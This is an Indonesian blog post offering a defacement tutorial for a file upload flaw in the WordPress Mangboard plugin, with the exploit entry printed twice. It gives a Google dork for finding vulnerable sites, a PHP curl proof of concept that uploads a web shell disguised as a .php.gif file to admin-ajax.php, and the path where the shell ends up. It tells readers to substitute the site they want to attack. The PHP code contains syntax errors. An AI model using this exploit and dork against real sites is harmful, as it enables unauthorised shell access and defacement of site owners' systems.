Tutorial Deface Metode Mangboard Plugins File Upload Vulnerability
# Exploit Title: Wordpress Mangboard Plugins File Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/mangboard/
# Exploit : /wp-admin/admin-ajax.php
# Date: 16-04-2017
# Exploit Author: Isal Dot ID
# Vendor Homepage: https://srd.wordpress.org/plugins/mangboard/
# Version: webapps
# Tested on: Windows 7
1. Description
You can upload files without acces as author
2. Proof of Concept
<?php
$uploadfile="yourfile.php.gif"; you can change php5 , phtml , php.fla etc
$ch = curl_init("http://target.com/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Ganti : target.com dengan situs yang mau di bedah.
Folder shell : /wp-content/uploads/mangboard/years/month/random nomor/random_yourshell.php.gif
# Google Dork: inurl:wp-content/plugins/mangboard/
# Exploit : /wp-admin/admin-ajax.php
# Date: 16-04-2017
# Exploit Author: Isal Dot ID
# Vendor Homepage: https://srd.wordpress.org/plugins/mangboard/
# Version: webapps
# Tested on: Windows 7
1. Description
You can upload files without acces as author
2. Proof of Concept
<?php
$uploadfile="yourfile.php.gif"; you can change php5 , phtml , php.fla etc
$ch = curl_init("http://target.com/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Ganti : target.com dengan situs yang mau di bedah.
Folder shell : /wp-content/uploads/mangboard/years/month/random nomor/random_yourshell.php.gif
Belum ada Komentar untuk "Tutorial Deface Metode Mangboard Plugins File Upload Vulnerability"
Posting Komentar